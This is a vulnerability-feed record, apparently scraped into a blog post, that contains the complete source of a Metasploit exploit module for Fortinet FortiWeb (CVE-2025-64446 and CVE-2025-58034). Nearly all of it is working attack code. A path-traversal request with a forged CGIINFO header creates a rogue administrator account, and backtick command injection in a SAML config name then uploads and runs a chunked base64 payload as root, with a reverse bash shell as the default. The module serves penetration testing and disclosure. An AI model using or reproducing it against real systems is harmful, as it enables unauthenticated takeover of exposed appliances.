{“lastseen”:”2025-11-26T18:16:04″,”description”:”This Metasploit module exploits an authentication bypass via a path traversal vulnerability in the Fortinet FortiWeb management interface to create a new local administrator user account. From there a command injection vulnerability is leveraged to…”,”published”:”2025-11-26T00:00:00″,”modified”:”2025-11-26T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Fortinet FortiWeb Unauthenticated Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:212098″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-58034″,”CVE-2025-64446″],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n \\n include Rex::Proto::Http::WebSocket\\n include Msf::Exploit::Remote::HttpClient\\n prepend Msf::Exploit::Remote::AutoCheck\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Fortinet FortiWeb unauthenticated RCE’,\\n ‘Description’ =\\u003e %q{\\n This exploit module exploits an authentication bypass via path traversal vulnerability in the Fortinet\\n FortiWeb management interface to create a new local administrator user account. From there a command\\n injection vulnerability is leveraged to achieve RCE with root privileges.\\n \\n The auth bypass CVE-2025-64446 affects the following versions:\\n \\n * FortiWeb 8.0.0 through 8.0.1 (Patched in 8.0.2 and above)\\n * FortiWeb 7.6.0 through 7.6.4 (Patched in 7.6.5 and above)\\n * FortiWeb 7.4.0 through 7.4.9 (Patched in 7.4.10 and above)\\n * FortiWeb 7.2.0 through 7.2.11 (Patched in 7.2.12 and above)\\n * FortiWeb 7.0.0 through 7.0.11 (Patched in 7.0.12 and above)\\n \\n The command injection CVE-2025-58034 affects the following versions (Note the 7.6 and 7.4 branches are very\\n slightly different when compared to the patch versions for CVE-2025-64446:\\n \\n * FortiWeb 8.0.0 through 8.0.1 (Patched in 8.0.2 and above)\\n * FortiWeb 7.6.0 through 7.6.5 (Patched in 7.6.6 and above) \\u003c– slight difference\\n * FortiWeb 7.4.0 through 7.4.10 (Patched in 7.4.11 and above) \\u003c– slight difference\\n * FortiWeb 7.2.0 through 7.2.11 (Patched in 7.2.12 and above)\\n * FortiWeb 7.0.0 through 7.0.11 (Patched in 7.0.12 and above)\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Defused’, # PoC from honeypot for CVE-2025-64446\\n ‘sfewer-r7’, # MSF module and CVE-2025-58034 analysis\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-64446’], # Auth bypass\\n [‘CVE’, ‘2025-58034’], # Command Injection\\n [‘URL’, ‘https:\/\/attackerkb.com\/topics\/zClpINmLCh\/cve-2025-58034\/rapid7-analysis’], # Analysis of CVE-2025-58034\\n [‘URL’, ‘https:\/\/x.com\/defusedcyber\/status\/1975242250373517373’], # Original PoC for CVE-2025-64446 posted online\\n [‘URL’, ‘https:\/\/github.com\/watchtowrlabs\/watchTowr-vs-Fortiweb-AuthBypass’], # PoC for CVE-2025-64446\\n [‘URL’, ‘https:\/\/www.pwndefend.com\/2025\/11\/13\/suspected-fortinet-zero-day-exploited-in-the-wild\/’],\\n [‘URL’, ‘https:\/\/www.rapid7.com\/blog\/post\/etr-critical-vulnerability-in-fortinet-fortiweb-exploited-in-the-wild\/’],\\n [‘URL’, ‘https:\/\/www.fortiguard.com\/psirt\/FG-IR-25-910’], # Vendor advisory for CVE-2025-64446\\n [‘URL’, ‘https:\/\/www.fortiguard.com\/psirt\/FG-IR-25-513’] # Vendor advisory for CVE-2025-58034\\n ],\\n # CVE-2025-64446 was disclosed on Nov 14, 2025, CVE-2025-58034 was disclosed on Nov 18, 2025.\\n # Both vulnerabilities were silently patched by the vendor prior to this date.\\n ‘DisclosureDate’ =\\u003e ‘2025-11-14’,\\n ‘Privileged’ =\\u003e true, # Executes as root.\\n ‘Platform’ =\\u003e ‘unix’, # Only some of the unix payloads have been verified to work, the Linux fetch payloads dont execute.\\n ‘Arch’ =\\u003e [ARCH_CMD],\\n ‘Targets’ =\\u003e [\\n [\\n # NOTE: Tested with the following payloads against a vulnerable FortiWeb 8.0.1 and 7.4.8:\\n # cmd\/unix\/reverse_bash\\n # cmd\/unix\/reverse_openssl\\n ‘Default’, {\\n ‘Payload’ =\\u003e {\\n ‘BadChars’ =\\u003e ‘\\”‘\\n }\\n }\\n ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘cmd\/unix\/reverse_bash’,\\n ‘RPORT’ =\\u003e 443,\\n ‘SSL’ =\\u003e true,\\n # The maximum time in seconds to wait for a session.\\n ‘WfsDelay’ =\\u003e 30\\n },\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS],\\n ‘RelatedModules’ =\\u003e [‘auxiliary\/admin\/http\/fortinet_fortiweb_create_admin’]\\n }\\n )\\n )\\n \\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘Base path’, ‘\/’])\\n ])\\n \\n register_advanced_options(\\n [\\n OptString.new(‘FortiWebAdminUsername’, [false, ‘A valid admin username to use. A new admin account will be created if not specified.’, nil]),\\n OptString.new(‘FortiWebAdminPassword’, [false, ‘A valid admin password to use. A new admin account will be created if not specified.’, nil]),\\n OptString.new(‘FortiWebAccessProfile’, [ true, ‘The access profile to use for the new admin account’, ‘prof_admin’ ]),\\n OptString.new(‘FortiWebDomain’, [ true, ‘The domain to use for the new admin account’, ‘root’ ]),\\n OptString.new(‘FortiWebDefaultAdminAccount’, [ true, ‘The default FortiWeb admin account name’, ‘admin’ ]),\\n OptString.new(‘FortiWebWritableDir’, [true, ‘The full path of a writable directory on the target.’, ‘\/tmp’])\\n ]\\n )\\n end\\n \\n def check\\n res = post_auth_bypass_request({ data: {} })\\n \\n return CheckCode::Unknown(‘Connection failed’) unless res\\n \\n return Exploit::CheckCode::Safe(‘Received a 403 Forbidden response’) if res.code == 403\\n \\n j = JSON.parse(res.body)\\n \\n return Exploit::CheckCode::Appears if j.dig(‘results’, ‘message’) == ‘Empty value isn\\\\’t allowed.’\\n \\n CheckCode::Unknown(‘Unexpected JSON results’)\\n rescue JSON::ParserError\\n return CheckCode::Unknown(‘Failed to parse JSON body’)\\n end\\n \\n def exploit\\n if datastore[‘FortiWebAdminUsername’].nil? || datastore[‘FortiWebAdminPassword’].nil?\\n print_status(‘Creating a new admin account via CVE-2025-64446…’)\\n \\n admin_username = Faker::Internet.username\\n admin_password = Rex::Text.rand_text_alpha(8)\\n \\n create_admin_account(admin_username, admin_password)\\n \\n print_good(\\”New admin account successfully created: #{admin_username}:#{admin_password}\\”)\\n else\\n admin_username = datastore[‘FortiWebAdminUsername’]\\n admin_password = datastore[‘FortiWebAdminPassword’]\\n \\n print_good(\\”Using existing admin credentials: #{admin_username}:#{admin_password}\\”)\\n end\\n \\n print_status(‘Logging in…’)\\n \\n cookie_jar.clear\\n \\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘logincheck’),\\n ‘keep_cookies’ =\\u003e true,\\n ‘vars_post’ =\\u003e {\\n ‘username’ =\\u003e admin_username,\\n ‘secretkey’ =\\u003e admin_password\\n }\\n )\\n \\n fail_with(Msf::Exploit::Failure::UnexpectedReply, ‘Connection failed.’) unless res\\n \\n fail_with(Msf::Exploit::Failure::UnexpectedReply, \\”Unexpected response code: #{res.code}\\”) unless res.code == 200\\n \\n unless cookie_jar.cookies.find { |c| c.name.start_with? ‘APSCOOKIE_FWEB’ }\\n fail_with(Msf::Exploit::Failure::UnexpectedReply, ‘No APSCOOKIE_FWEB returned’)\\n end\\n \\n print_good(\\”Successfully logged in as #{admin_username}\\”)\\n \\n begin\\n print_status(‘Executing payload via CVE-2025-58034…’)\\n \\n execute_payload\\n rescue Rex::Proto::Http::WebSocket::ConnectionError =\\u003e e\\n fail_with(Msf::Exploit::Failure::UnexpectedReply, \\”CLI websocket connection error: #{e}\\”)\\n end\\n \\n print_good(‘Finished.’)\\n end\\n \\n def execute_payload\\n tmp_file_name = Rex::Text.rand_text_alphanumeric(4)\\n \\n bootstrap_payload = \\”rm -f #{datastore[‘FortiWebWritableDir’]}\/#{tmp_file_name}*;\\”\\n # We need to detach our payload from the current session, as when the TCP connections from out HTTP(S) requests close,\\n # the device will tear down any child processes from the CLI, intern killing our payload prematurely. We would normally\\n # use the nohup command for this, however this is unavailable on certain versions (available on 8.0.1, unavailable\\n # on 7.4.8). To work around this, the bootstrap payload below will leverage Python, and use the Popen argument\\n # start_new_session to do essentially what nohup does – call setsid() to create a new session. This has been\\n # confirmed to work as expected on 8.0.1 and 7.4.8.\\n bootstrap_payload += \\”python -c \\\\\\”import subprocess;subprocess.Popen(f\\\\\\\\\\\\\\”#{payload.encoded}\\\\\\\\\\\\\\”,shell=True,start_new_session=True,stdout=subprocess.DEVNULL,stderr=subprocess.DEVNULL)\\\\\\”\\”\\n \\n vprint_status(\\”Using bootstrap payload: #{bootstrap_payload}\\”)\\n \\n bootstrap_payload = Base64.strict_encode64(bootstrap_payload)\\n \\n idx = 1\\n idx_prefix = ”\\n \\n # Our command injection can at most be 63 characters. We need 2 characters for a double back tick, and\\n # 23 for the echo command that writes the chunk to a file (assuming a path of \/tmp and a single digit idx\\n # value). So by default, the chunk size will be 38. However, this may change as we write the chunks.\\n # To ensure the `cat tmp_file_name*` command amalgamates the files in the correct order, if an idx goes above 9,\\n # we reset the idx back to 1, and append a ‘9’ character to an idx_prefix variable. This will ensure we get\\n # sequential files, for example tmp1, tmp2, …, tmp9, tmp91, tmp92, …, tmp99, tmp991, tmp992, …\\n # A result of appending a character to the idx_prefix variable, is we can write 1 less character in the chunk, so\\n # we must recompute the chunk size, to ensure we don’t go over the 63-character limit.\\n chunk_size = 63 – 2 – \\”echo -n |tee #{datastore[‘FortiWebWritableDir’]}\/#{tmp_file_name}#{idx_prefix}#{idx}\\”.length\\n \\n # We write to a file via tee, as the \\u003e character is a bad char (so we cant do \\”echo foo \\u003e file\\” and\\n # instead do \\”echo foo|tee file\\”).\\n \\n # We also base64 encode the data we write, as single and double quotes are also bad chars, so we cant write\\n # them, and therefore white spaces are also an issue.\\n \\n # We display the progress to the user, so track that with a current and max chunk number.\\n curr_chunk_number = 1\\n \\n max_chunk_number = (bootstrap_payload.length \/ chunk_size) + 1\\n \\n while bootstrap_payload \\u0026\\u0026 !bootstrap_payload.empty?\\n \\n print_status(\\”Uploading bootstrap payload chunk #{curr_chunk_number} of #{max_chunk_number}…\\”)\\n \\n chunk = bootstrap_payload[0, chunk_size]\\n \\n bootstrap_payload = bootstrap_payload[chunk_size..]\\n \\n execute_cmd(\\”echo -n #{chunk}|tee #{datastore[‘FortiWebWritableDir’]}\/#{tmp_file_name}#{idx_prefix}#{idx}\\”)\\n \\n idx += 1\\n \\n if idx \\u003e 9\\n idx = 1\\n idx_prefix += ‘9’\\n # Adjust chunk_size, as the idx_prefix value has had a ‘9’ character appended to it, so the\\n # next chunk must have 1 less character.\\n chunk_size -= 1\\n # If the payload was too big, and we run out of space in the command to write any chunk data, fail.\\n # This is unlikely to occur in practise, as the MSF payload command would need to be very large to exhaust the\\n # available space to write it. Back of a napkin calculation would be for every 9 chunks we get 1 less\\n # character, so starting with a chunk size of 36, we have (36 * 9) + (35 * 9) + (34 * 9), … + (1 * 9), which\\n # would be a max MSF payload size of 5670 characters. Calculated with the command:\\n # ruby -e \\”sz=0; 1.upto(36){ |i| sz += ((36-i)*9) };p sz\\”\\n fail_with(Failure::BadConfig, ‘No more space in the command to write chunk data, choose a smaller payload’) if chunk_size.zero?\\n end\\n \\n curr_chunk_number += 1\\n end\\n \\n print_status(‘Amalgamating bootstrap payload chunks…’)\\n \\n execute_cmd(\\”cat #{datastore[‘FortiWebWritableDir’]}\/#{tmp_file_name}*|tee #{datastore[‘FortiWebWritableDir’]}\/#{tmp_file_name}\\”)\\n \\n print_status(‘Executing bootstrap payload…’)\\n \\n execute_cmd(\\”cat #{datastore[‘FortiWebWritableDir’]}\/#{tmp_file_name}|base64 -d|sh\\”)\\n end\\n \\n def execute_cmd(cmd)\\n vprint_status(\\”Executing OS command: #{cmd}\\”)\\n \\n # These bad chars are not allowed in a SAML config name, which is the command injection we leverage.\\n # We also look for backticks, which are allowed, but we use two of them below to get command execution so we\\n # don’t want the incoming cmd to contain any as that would break our injection.\\n ‘`#()\\u003e\\\\’\\”‘.each_char do |bad_char|\\n fail_with(Failure::BadConfig, \\”Bad cmd char #{bad_char} in execute_cmd\\”) if cmd.include? bad_char\\n end\\n \\n # The max name length is 63 characters, less 2 for the double backtick, so 61 are available for the OS command.\\n fail_with(Failure::BadConfig, ‘Command too long for execute_cmd’) if cmd.length \\u003e (63 – 2)\\n \\n vprint_status(‘Connecting to the CLI websocket…’)\\n \\n wsock_headers = {\\n ‘Cookie’ =\\u003e ”\\n }\\n \\n cookie_jar.cookies.each do |c|\\n wsock_headers[‘Cookie’] += \\”#{c}; \\”\\n end\\n \\n wsock = connect_ws(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘ws’, ‘cli’, ‘open’),\\n ‘headers’ =\\u003e wsock_headers\\n )\\n \\n vprint_good(‘Successfully connected to the CLI websocket’)\\n \\n cli_commands = [\\n ‘config user saml-user’,\\n \\”edit \\\\\\”`#{cmd}`\\\\\\”\\”,\\n \\”set entityID http:\/\/#{Rex::Text.rand_text_alpha(4..8)}\\”,\\n \\”set service-path \/#{Rex::Text.rand_text_alpha(4..8)}\\”,\\n ‘set enforce-signing disable’,\\n ‘set slo-bind post’,\\n \\”set slo-path \/#{Rex::Text.rand_text_alpha(4..8)}\\”,\\n ‘set sso-bind post’,\\n \\”set sso-path \/#{Rex::Text.rand_text_alpha(4..8)}\\”,\\n ‘end’\\n ]\\n \\n wsock.wsloop do |buffer, _|\\n vprint_line(buffer)\\n \\n if buffer.end_with? ‘ # ‘\\n cli_command = cli_commands.shift\\n \\n break if cli_command.nil?\\n \\n vprint_status(\\”Running CLI command: #{cli_command}\\”)\\n \\n wsock.put_wsbinary(\\”#{cli_command}\\\\n\\”)\\n \\n break if cli_commands.empty?\\n end\\n end\\n end\\n \\n # The FortiWeb reverse proxy\/WebSocket server appears to be non-compliant. The \\”Upgrade\\” header is supposed to\\n # be case-insensitive, and by default Metasploit will use \\”WebSocket\\”, however the FortiWeb device will only\\n # accept lower case, so we force \\”websocket\\” to be used instead.\\n def connect(opts = {})\\n if opts.dig(‘headers’, ‘Upgrade’) == ‘WebSocket’\\n opts[‘headers’][‘Upgrade’].downcase!\\n end\\n super\\n end\\n \\n # Create a new local admin account via CVE-2025-64446.\\n def create_admin_account(admin_username, admin_password)\\n request_data = {\\n data: {\\n ‘q_type’ =\\u003e 1,\\n ‘name’ =\\u003e admin_username,\\n ‘access-profile’ =\\u003e datastore[‘FortiWebAccessProfile’],\\n ‘access-profile_val’ =\\u003e ‘0’,\\n ‘trusthostv4’ =\\u003e ‘0.0.0.0\/0’,\\n ‘trusthostv6’ =\\u003e ‘::\/0’,\\n ‘last-name’ =\\u003e ”,\\n ‘first-name’ =\\u003e ”,\\n ’email-address’ =\\u003e ”,\\n ‘phone-number’ =\\u003e ”,\\n ‘mobile-number’ =\\u003e ”,\\n ‘hidden’ =\\u003e 0,\\n ‘domains’ =\\u003e datastore[‘FortiWebDomain’],\\n ‘sz_dashboard’ =\\u003e -1,\\n ‘type’ =\\u003e ‘local-user’,\\n ‘type_val’ =\\u003e ‘0’,\\n ‘admin-usergrp_val’ =\\u003e ‘0’,\\n ‘wildcard_val’ =\\u003e ‘0’,\\n ‘accprofile-override_val’ =\\u003e ‘0’,\\n ‘sshkey’ =\\u003e ”,\\n ‘passwd-set-time’ =\\u003e 0,\\n ‘history-password-pos’ =\\u003e 0,\\n ‘history-password0’ =\\u003e ”,\\n ‘history-password1’ =\\u003e ”,\\n ‘history-password2’ =\\u003e ”,\\n ‘history-password3’ =\\u003e ”,\\n ‘history-password4’ =\\u003e ”,\\n ‘history-password5’ =\\u003e ”,\\n ‘history-password6’ =\\u003e ”,\\n ‘history-password7’ =\\u003e ”,\\n ‘history-password8’ =\\u003e ”,\\n ‘history-password9’ =\\u003e ”,\\n ‘force-password-change’ =\\u003e ‘disable’,\\n ‘force-password-change_val’ =\\u003e ‘0’,\\n ‘password’ =\\u003e admin_password\\n }\\n }\\n \\n res = post_auth_bypass_request(request_data)\\n \\n fail_with(Msf::Exploit::Failure::UnexpectedReply, ‘Connection failed.’) unless res\\n \\n fail_with(Msf::Exploit::Failure::NotVulnerable, ‘Target does not appear vulnerable (403 Forbidden response)’) if res.code == 403\\n \\n unless res.code == 200\\n if res.headers[‘Content-Type’] == ‘application\/json’\\n begin\\n response_data = JSON.parse(res.body)\\n print_bad(response_data.to_s)\\n rescue JSON::ParserError\\n print_bad(‘failed to parse response JSON data’)\\n end\\n end\\n fail_with(Msf::Exploit::Failure::UnexpectedReply, \\”Target returned an unexpected response (#{res.code})\\”)\\n end\\n end\\n \\n def post_auth_bypass_request(request_data)\\n cgi_info = {\\n ‘username’ =\\u003e datastore[‘FortiWebDefaultAdminAccount’],\\n ‘profname’ =\\u003e datastore[‘FortiWebAccessProfile’],\\n ‘vdom’ =\\u003e datastore[‘FortiWebDomain’],\\n ‘loginname’ =\\u003e datastore[‘FortiWebDefaultAdminAccount’]\\n }\\n \\n send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘\/api\/v2.0\/cmdb\/system\/admin%3F\/..\/..\/..\/..\/..\/cgi-bin\/fwbcgi’),\\n ‘headers’ =\\u003e {\\n ‘CGIINFO’ =\\u003e Base64.strict_encode64(cgi_info.to_json)\\n },\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e request_data.to_json\\n )\\n end\\n end”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212098″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212098\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-11-26T18:16:04″,”description”:”This Metasploit module exploits an authentication bypass via a path traversal vulnerability in the Fortinet FortiWeb management interface to create a new local administrator user…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-27754","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n